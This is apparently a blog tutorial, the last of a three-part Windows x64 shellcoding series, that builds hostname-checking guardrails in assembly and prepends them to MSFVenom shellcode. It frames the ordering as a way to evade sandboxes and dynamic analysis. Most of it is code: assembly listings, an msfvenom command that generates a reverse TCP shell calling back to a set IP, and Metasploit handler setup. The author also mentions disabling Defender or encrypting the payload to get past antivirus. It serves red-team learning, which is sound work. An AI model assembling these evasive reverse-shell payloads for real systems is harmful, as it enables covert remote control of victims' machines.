The third and final part of a three-part series on Windows x64 shellcoding, going from a basic Hello World program in Assembly to implementing guardrails in MSFVenom shellcode.
Part 1 – Assembly and WinAPIs – Hello World
Part 2 – Assembly to Shellcode – Stack Buffers and WinAPIs
Part 3 – Adding extra functionality to MSFVenom
Most shellcoding tutorials show really interesting techniques but don’t show anything practical, so I wanted to end this series by using the material to implement something interesting: our own custom guardrails in MSFVenom shellcode.
In my experience, traditional payload development often follows this pattern (I’m using shellcode here in its traditional meaning, i.e. code that results in a shell, rather than just machine code):
- Guard rails
- Process injection
- Shellcode
What if we used our knowledge of Assembly to flip this order, so that we end up with the following?
- Process injection
- Guard rails
- Shellcode
This is purely speculative, but I suspect that this may be slightly more evasive than the traditional approach. My reasoning is that process injection is a distinctive section of a payload, which analysts may expect to be followed by explosive and malicious behavior. So if we add guardrails at the beginning of the shellcode, but after the process injection occurs, this may add an extra layer of defense against sandbox and dynamic analysis.
My initial idea for implementing this was to have two pieces of shellcode: a custom piece that implements the guardrails, and a second piece created by MSFVenom. We could then combine them as follows:
guardrails = "\x48\x83\xec..."
msfvenom = "\xfc\x48\x83..."
shellcode = guardrails + msfvenom
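One detail worth noting if you assemble the payload in Python 3: the literals above are `str` objects, and a non-ASCII escape such as `\xfc` in a `str` is a Unicode character that would be encoded as more than one byte when written out. A minimal sketch using `bytes` literals (note the `b` prefix) instead; the byte values are hypothetical placeholders, since the real shellcode is elided in the text:

```python
# Hypothetical placeholder bytes: the real guardrail and msfvenom bytes are elided above.
guardrails = b"\x90\x90\x90"  # stand-in for the custom guardrail stub
msfvenom = b"\xcc"            # stand-in for the msfvenom payload

# bytes + bytes stays raw bytes, so execution falls straight from
# the last guardrail instruction into the first payload instruction.
shellcode = guardrails + msfvenom

print(shellcode.hex())  # 909090cc
```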
We’ve already used GetComputerNameA, so let’s use the hostname of the computer as the guardrail for the shellcode.
Attempt 1 – Conditional Jumps
My first idea was to use conditional jumps, with labels defining the sections that execution could jump to depending on a comparison against the output of GetComputerNameA.
cmp r13b, byte [r14+1]
je branch2
branch1:
; guardrails failed, do something and exit
branch2:
; guardrails succeeded, execute msf
The problem with this is that labels, e.g. branch1 and branch2, are compiled into specific memory addresses, so this won’t work when injecting the shellcode into a new process. Another problem is that we can’t use je and similar instructions because they require labels, so I am only able to use jmp.
Attempt 2 – Calculated Jumps
I didn’t really know what to call this, so I just called it a calculated jump. If we write our code as if it had labels, but lay the sections out one after another, the result may look something like this:
guardrails -> jump instruction -> branch1 -> branch2
My idea for calculated jumps is to work out the distance from the jump instruction’s address to branch1, and from branch1 to branch2. Let’s say the distance from the jump to branch1 is 10 bytes, and the distance from branch1 to branch2 is 20 bytes. Then, if we can get the value of the Zero Flag, we can dynamically build the offset to the correct branch.
jmp_instr_addr + distance_to_b1 + (zf * distance_to_b2)
So, depending on the output of the guardrails, the Zero Flag is either 0 or 1, and our offset from the jump instruction address leads us into either branch1 or branch2.
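The formula can be sanity-checked with plain integer arithmetic before touching any assembly. A small sketch using the example distances from the text (10 bytes to branch1, then 20 more to branch2); the base address `0x1000` is a hypothetical value chosen only for illustration:

```python
def branch_target(jmp_instr_addr: int, distance_to_b1: int,
                  distance_to_b2: int, zf: int) -> int:
    """Address reached by the single computed jump.

    zf is the Zero Flag captured as 0 or 1 after the guardrail compare.
    """
    if zf not in (0, 1):
        raise ValueError("zf must be 0 or 1")
    return jmp_instr_addr + distance_to_b1 + zf * distance_to_b2


base = 0x1000  # hypothetical address of the jump instruction
print(hex(branch_target(base, 10, 20, 0)))  # 0x100a: branch1 (guardrails failed)
print(hex(branch_target(base, 10, 20, 1)))  # 0x101e: branch2 (guardrails passed)
```

Multiplying by the flag rather than branching on it is the whole trick: there is only one possible jump instruction, and the flag just scales how far it goes.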
As an extra measure you can also add NOP sleds between each area. Personally I did this because it helps in case you end up off by one: you then land in the NOP sled. You can also align the jump offsets to multiples of 16 (not sure if this is important, stack alignment issues just fucked me up too much).
cmp r13b, byte [r14+1] ; compare bytes
sete al ; set al to zero flag
movzx rax, al ; zero extend al
mov rcx, 16 ; distance to jmp to branch1
mov rbx, 160 ; distance from branch1 to branch2
imul rbx, rax ; 0 or 1 multiplied by 160, so either 0 or 160
add rcx, rbx ; rcx is now 16 (16+0) or 176 (16+160)
mov rbx, $ ; get current assembly position
add rbx, rcx ; add jump offset
jmp rbx ; do conditional jump with single jmp
; push rbx && ret also worked
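The register arithmetic in this listing can be checked outside a debugger. A minimal Python model, assuming the same 16-byte and 160-byte distances, shows that the computed offset only ever takes one of two values. It models the `sete`/`movzx`/`imul`/`add` steps only, not where the jump actually lands in memory:

```python
def jump_offset(byte_a: int, byte_b: int) -> int:
    """Mirror of the listing: cmp / sete / movzx / imul / add."""
    al = 1 if byte_a == byte_b else 0  # sete al: 1 when ZF is set (bytes equal)
    rax = al                           # movzx rax, al: zero-extend to 64 bits
    rcx = 16                           # distance to branch1
    rbx = 160 * rax                    # imul rbx, rax: 0 or 160
    return rcx + rbx                   # add rcx, rbx: 16 or 176


print(jump_offset(0x4A, 0x4A))  # 176: branch2
print(jump_offset(0x4A, 0x41))  # 16: branch1
```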
I was able to get this logic working when compiling as an executable, but it didn’t work as shellcode. I’m still not sure why; if you know, or have any solutions, please let me know. I suspect it’s something to do with how the current assembly position is calculated when the code runs as shellcode.
Attempt 3 – Run or Die
So finally I accepted that I couldn’t get conditional jumps working, and started thinking about other solutions. In assembly, 0 can be interpreted in two ways: as a NULL pointer, or as the integer 0. If we return to our MessageBoxA example and look at the third argument, passed in r8, it expects a pointer to a string to display as the message box title, or alternatively NULL. This means that if we put 0 or 1 in this argument, our code will either succeed or crash: NULL is accepted (Windows falls back to a default title), while 1 is an invalid pointer. So, continuing from our progress in part 2, let’s get the guardrails working.
We can implement our guardrails after our GetComputerNameA call and before our MessageBoxA call. I’m using r15, r13 and rax here just because of the context of the surrounding code, and I don’t have to save anything onto the stack because these values are reassigned before they are used again.
xor r15, r15 ; used for global boolean guardrail check
xor r13, r13 ; used for storing chars to compare to hostname
xor rax, rax ; use as a per-char guardrail check
mov r15, 1 ; set boolean for guardrail
First, I cleared the registers just in case a stray higher-order bit causes problems. Next, we iterate over the hostname stored in our stack buffer one character at a time. In my example the hostname is JWIN11, so we need to repeat the following code six times, changing the character and the buffer offset each time.
mov r13b, 0x4a ; J
cmp r13b, byte [r14+0] ; compare first byte
sete al ; al = 1 if ZF is set (bytes equal), else 0
movzx rax, al ; zero extend al into rax
and r15, rax ; r15 stays 1 only while every char matches (not efficient)
So if all of our checks passed, r15 should contain 1, otherwise 0. We copy it into r13 because the code used from Nytro’s blog will place the base address of the DLL into r15. However, we need 0 in r13 if we want execution to continue successfully, so we xor the value with 1 to invert it.
mov r13, r15
xor r13, 1
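To see how the unrolled per-character checks and the final inversion combine, here is a small Python model of the register logic, assuming the hostname buffer starts at offset 0 as in the first comparison above. The function name `guardrail_caption` is hypothetical; it returns the value that ends up in r13 and is later passed as the caption argument:

```python
def guardrail_caption(hostname_buffer: bytes, expected: bytes) -> int:
    """Return the value that ends up in r13 (and then r8 / lpCaption)."""
    r15 = 1  # mov r15, 1: assume a match until proven otherwise
    for i, ch in enumerate(expected):  # one unrolled block per character
        # cmp + sete al: 1 only if the buffer byte exists and matches
        al = 1 if i < len(hostname_buffer) and hostname_buffer[i] == ch else 0
        r15 &= al  # and r15, rax: any mismatch clears it for good
    return r15 ^ 1  # mov r13, r15 / xor r13, 1


print(guardrail_caption(b"JWIN11", b"JWIN11"))  # 0: NULL caption, MessageBoxA runs
print(guardrail_caption(b"JWIN12", b"JWIN11"))  # 1: invalid pointer, process crashes
```

Like the assembly, the model only compares the expected characters, so any hostname that starts with JWIN11 also passes.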
After using the method described in Nytro’s blog, we can get a pointer to User32.dll, then call GetProcAddress with MessageBoxA. We should now have the address of MessageBoxA in r15.
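mov rcx, 0 ; hWnd = NULL
mov rdx, r14 ; lpText: our stack buffer from part 2
mov r8, r13 ; lpCaption: 0 (NULL) if guardrails passed, 1 (invalid pointer) if not
mov r9, 0 ; uType = 0 (MB_OK)
call r15 ; MessageBoxA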
Now, if we compile and extract the shellcode as we did in part 2, up to and including our latest MessageBoxA call, and append the msfvenom shellcode after it, our guardrails should act as an extra layer of defense before our final shellcode executes. I’m going to use an x64 reverse shell from MSFVenom. Note that you will need to disable Defender or encrypt the shellcode to bypass AV.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.180.219 LPORT=4444 -f c
Then set up the handler in Metasploit.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.19.180.219
msf6 exploit(multi/handler) > run
Then execute the final EXE containing your guardrails and msfvenom shellcode. If your guardrails don’t match your hostname, the EXE should just silently crash. If the hostname matches, you should see a message box appear; after selecting OK, the reverse shell should execute, followed by satisfaction.
If you’ve got this far, the best thing you can do is rewrite this to do something else. Following a tutorial is easy, implementing something new requires effort. My intention for this series was to provide an easy introduction, covering a lot of things that required extra research and weren’t covered by other tutorials, and to finish it by implementing something interesting so people can see a cool use case for learning how to do this stuff by hand.
If you learnt something cool or this helped you with something, send me BTC for beer 🙂
bc1qannme72ya2gechk2ued2f96ec6v2veyctvz7mc